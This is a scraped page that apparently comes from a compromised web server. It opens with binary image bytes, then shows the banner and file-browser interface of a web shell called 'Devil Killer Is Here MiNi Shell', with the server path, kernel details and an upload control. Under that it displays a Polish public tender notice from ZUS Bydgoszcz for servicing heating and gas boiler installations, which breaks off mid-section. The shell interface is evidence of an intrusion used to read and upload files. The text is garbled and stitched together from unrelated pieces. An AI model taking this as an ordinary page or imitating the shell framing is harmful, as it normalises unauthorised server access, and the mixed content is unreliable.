JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251001/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251001/0045126501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Serwis węzłów cieplnych, kotłowni gazowych oraz instalacji centralnego ogrzewania i ciepła technologicznego w budynkach Oddziału ZUS w Bydgoszczy i podległych TJO </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Ubezpieczeń Społecznych</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział w Bydgoszczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 00001775600102</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Świętej Trójcy 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-224</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 3418308</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampubl_bydgoszcz@zus.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zus.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Zakład Ubezpieczeń Społecznych lub Kasa Rolniczego Ubezpieczenia Społecznego oraz zarządzane przez nie fundusze</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ubezpieczenia społeczne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Serwis węzłów cieplnych, kotłowni gazowych oraz instalacji centralnego ogrzewania i ciepła technologicznego w budynkach Oddziału ZUS w Bydgoszczy i podległych TJO </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bb6e7d0b-3a85-4635-9705-9d54501a50a6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00451265</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00565701/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Serwis węzłów cieplnych, kotłowni gazowych oraz instalacji centralnego ogrzewania i ciepła technologicznego w budynkach Oddziału ZUS w Bydgoszczy i podległych TJO</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zus.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> Zamawiający udostępni Wykonawcom kod do odszyfrowania opisu przedmiotu zamówienia (OPZ) stanowiącego cz. III SWZ, o którym mowa w pkt 2.1.3. SWZ, na wniosek Wykonawcy pod warunkiem złożenia przez Wykonawcę oświadczenia o zachowaniu poufności informacji zawartych w cz. III SWZ przy użyciu polecenia „Zadaj pytanie” (przed przystąpieniem do postępowania) lub przez kafel „Wiadomości” (po przystąpieniu do postępowania). Wzór wniosku o udostępnienie kodu do odszyfrowania OPZ stanowi załącznik nr 11 do SWZ. Wzór oświadczenia o zachowaniu poufności OPZ stanowi załącznik nr 12 do SWZ. Wniosek o udostępnienie kodu do odszyfrowania OPZ i oświadczenie o zachowaniu poufności OPZ winny być sporządzone w formie elektronicznej i podpisane kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej i podpisane podpisem zaufanym lub podpisem osobistym przez osoby umocowane do reprezentacji Wykonawcy. W przypadku podpisania wniosku i oświadczenia przez pełnomocnika Wykonawcy należy załączyć stosowne pełnomocnictwo w postaci przewidzianej dla wniosku i oświadczenia. Udostępnienie kodu do odszyfrowania OPZ, po otrzymaniu przez Zamawiającego poprawnie sporządzonego wniosku Wykonawcy o udostępnienie kodu do odszyfrowania OPZ i oświadczenia Wykonawcy o zachowaniu poufności, zostanie dokonane na adres email Wykonawcy wskazany w jego wniosku o udostępnienie kodu do odszyfrowania OPZ <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, odbywa się<br/>przy użyciu środków komunikacji elektronicznej zapewnionych przez Platformę zakupową, umożliwiającą obsługę procesu udzielania<br/>zamówień publicznych za pośrednictwem środków komunikacji elektronicznej<br/>adres strony internetowej https://zus.ezamawiajacy.pl/<br/>Korzystanie z Platformy zakupowej przez Wykonawców jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgłoszenie do postępowania wymaga<br/>zalogowania Wykonawcy do Platformy zakupowej na subdomenie Zamawiającego https://zus.ezamawiajacy.pl/ lub<br/>https://oneplace.marketplanet.pl<br/>Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki<br/>procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>wymagane zgody, klika polecenie „zarejestruj się”;<br/>Rejestracja konta następuje poprzez kontakt z numerem telefonu podanym<br/>w potwierdzeniu lub jeżeli użytkownik nie skontaktuje się telefonicznie – konto zostanie aktywowane w ciągu maksymalnie 6 godzin<br/>roboczych; w związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie<br/>złożenia oferty w postaci elektronicznej i rozpocząć składanie oferty z odpowiednim wyprzedzeniem;<br/>Po założeniu konta Wykonawca ma możliwość złożenia oferty w postępowaniu;<br/>Szczegółowa instrukcja dla Wykonawców dotycząca korzystania<br/>z Platformy zakupowej, w tym m.in. składania ofert - dostępna jest na Platformie zakupowej w zakładce „Baza Wiedzy”;<br/>Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy zakupowej, w tym<br/>również problemów technicznych, Wykonawca powinien kontaktować się z dostawcą Platformy zakupowej tel. +48 22 257 22 23<br/>(infolinia dostępna w dni robocze, w godzinach 07.00-17.00) lub e-mail: oneplace@marketplanet.pl<br/>Zamawiający dopuszcza przesyłanie danych we wszystkich formatach wymienionych w rozporządzeniu Rady Ministrów z dnia 21<br/>maja 2024 r.<br/>w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych ,<br/>z zastrzeżeniem że rozmiar pojedynczego pliku nie może przekroczyć 2 GB, przy czym Zamawiający zaleca wykorzystywanie plików<br/>w formacie .pdf, doc, .docx., odt.<br/>Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie zakupowej:<br/>1. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512kb/s;<br/>2. komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>3. zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>4. zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie danych .pdf.<br/>Pliki oferty i załączników do niej złożone przez Wykonawcę na Platformie zakupowej są szyfrowane przez Platformę zakupową w<br/>momencie ich przesyłania na Platformę zakupową i nie są widoczne dla Zamawiającego; możliwość otworzenia ww. plików dostępna<br/>jest dopiero po odszyfrowaniu ich przez Zamawiającego po upływie terminu otwarcia ofert;<br/>Czas przeprocesowania transakcji może być różny w zależności od obciążenia serwera, co należy uwzględnić przy składaniu oferty i<br/>rozpocząć składanie oferty z odpowiednim wyprzedzeniem.<br/>W zależności od formatu kwalifikowanego podpisu (PAdES, XAdES) i jego typu (zewnętrzny, wewnętrzny) Wykonawca dołącza do<br/>Systemu uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z<br/>wszytym podpisem (typ wewnętrzny). Zamawiający określa dopuszczalny format podpisu elektronicznego jako:<br/><br/>1. dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES;<br/>2. dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W<br/>związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający jako administrator danych osobowych,<br/>obowiązany jest do spełnienia obowiązku informacyjnego z art. 13 RODO względem osób fizycznych, od których dane osobowe<br/>bezpośrednio pozyskał. Dotyczy to w szczególności:<br/>• wykonawcy będącego osobą fizyczną,<br/>• wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,<br/>• pełnomocnika wykonawcy będącego osobą fizyczną (np. dane osobowe zamieszczone w pełnomocnictwie),<br/>• członka organu zarządzającego wykonawcy, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK),<br/>• osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego.<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>Zamawiający informuje, że:<br/>• administratorem Pani/Pana danych osobowych jest Zakład Ubezpieczeń Społecznych z siedzibą w Warszawie, ul. Szamocka 3, 5,<br/>01-748 Warszawa;<br/>• Zakład Ubezpieczeń Społecznych wyznaczył Inspektora Ochrony Danych. Może się Pani/Pan z nim kontaktować we wszystkich<br/>sprawach, które dotyczą przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych:<br/>− listownie na adres:<br/>Inspektor Ochrony Danych<br/>ul. Szamocka 3, 5<br/>01-748 Warszawa<br/>− przez e-mail: ODO@zus.pl<br/>− za pośrednictwem eZUS/PUE ZUS<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonym w trybie podstawowym na „Serwis węzłów cieplnych, kotłowni gazowych oraz instalacji centralnego ogrzewania i ciepła technologicznego w budynkach Oddziału ZUS w Bydgoszczy i podległych TJO” znak postępowania: 040000.271.058.2025-OBYDGO oraz w celu spełnienia obowiązku prawnego wynikającego z<br/>przepisów ustawy;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Zgodnie z wytycznymi Urzędu Zamówień Publicznych, Wykonawca powinien złożyć stosowne oświadczenie. Treść oświadczenia<br/>została zawarta w pkt. 3.6 Formularza oferty, stanowiącego Załącznik nr 1 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">040000.271.058.2025-OBYDGO</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Serwis węzłów cieplnych, kotłowni gazowych oraz instalacji centralnego ogrzewania i ciepła technologicznego w budynkach Oddziału ZUS w Bydgoszczy i podległych TJO”, obejmujący wykonywanie: <br/>1)	konserwacji, przeglądów,<br/>2)	napraw,<br/>3)	legalizacji i kalibracji urządzeń instalacji wykrywania gazów,<br/>4)	utylizacji zużytych (wymienionych) części zamiennych, podzespołów, materiałów eksploatacyjnych, dodatkowych oraz innych wymagających tego elementów, na zasadach określonych w obowiązujących przepisach prawa,<br/>5)	pisemnych opinii lub ekspertyz technicznych,<br/>6)	Instrukcji eksploatacji urządzenia energetycznego lub grup urządzeń energetycznych dot. przedmiotu zamówienia,<br/>7)	innych czynności określonych w „Opisie przedmiotu zamówienia” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50720000-8 - Usługi w zakresie napraw i konserwacji centralnego ogrzewania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50531100-7 - Usługi w zakresie napraw i konserwacji kotłów grzewczych</p> <p class="mb-0">50531200-8 - Usługi w zakresie konserwacji aparatury gazowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryterium:<br/>	cena oferty brutto – znaczenie 60 %<br/>	doświadczenie serwisanta w zakresie serwisowania kotłowni gazowych – znaczenie 30 %<br/>	czas reakcji na zgłoszoną awarię kotła grzewczego/kotłowni – znaczenie 10%<br/><br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>LP = C + D+R<br/>gdzie:<br/>LP – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Cena oferty brutto”,<br/>D- punkty uzyskane w kryterium „ Doświadczenie serwisanta w zakresie serwisowania kotłowni gazowych’<br/>R - punkty uzyskane w kryterium „Czas reakcji na zgłoszoną awarię kotła grzewczego/kotłowni”,<br/>Ocena punktowa w kryterium „Cena oferty brutto”, dokonana zostanie na podstawie ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli w SWZ.<br/>Ocena punktowa w kryterium „Doświadczenie serwisanta w zakresie serwisowania kotłowni gazowych” zostanie dokonana według zasad określonych w tabeli w SWZ na podstawie oświadczenia Wykonawcy zawartego w formularzu ofertowym (załącznik nr 1 do SWZ), w którym Wykonawca poda liczbę lat doświadczenia serwisanta w serwisie kotłowni gazowych. Serwisant wskazany w formularzu ofertowym na potrzeby oceny w ramach kryterium oceny ofert musi spełniać warunki udziału w postępowaniu o których mowa w pkt. 4.1.1.4 (2) lit. C SWZ, na podstawie wykazu osób, stanowiącego załącznik 7b do SWZ.<br/>Wykonawca, który wykaże, że dysponuje serwisantem z uprawnieniami E w zakresie wskazanym w pkt.4.1.1.4 (2) lit.C SWZ, posiadającym doświadczenie w serwisowaniu kotłowni gazowych powyżej 5 lat otrzyma 6 pkt za każdy kolejny rok doświadczenia powyżej 5 lat, nie więcej niż 30 pkt.<br/>Ocena punktowa w kryterium „Czas reakcji na zgłoszoną awarię” dokonana zostanie na podstawie oświadczenia Wykonawcy złożonego w Formularzu ofertowym (załącznik nr 1 do SWZ), dotyczącego czasu reakcji (w pełnych godzinach) serwisu na zgłoszoną awarię kotła grzewczego/kotłowni licząc od chwili wysłania za pośrednictwem poczty elektronicznej lub w formie telefonicznej (potwierdzonej notatką służbową) zgłoszenia przez osobę odpowiedzialną za realizację umowy ze strony Zamawiającego do czasu rozpoczęcia naprawy, licząc w godzinach. Ocena punktowa dokonana zostanie wg zasad określonych w tabeli w SWZ. <br/>Punktacja wg oferowanego czasu reakcji w przedziałach<br/>do 10 godzin	0 pkt,<br/>do 7 godzin 5 pkt,<br/>do 4 godzin	10 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie serwisanta w zakresie serwisowania kotłowni gazowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszoną awarię kotła grzewczego/kotłowni</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają następujące warunki dotyczące:<br/>1.	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie określa warunku udziału w postępowaniu.<br/>2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej: <br/>Zamawiający nie określa warunku udziału w postępowaniu.<br/>3.	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie określa warunku udziału w postępowaniu.<br/>4.	zdolności technicznej lub zawodowej:<br/>1)	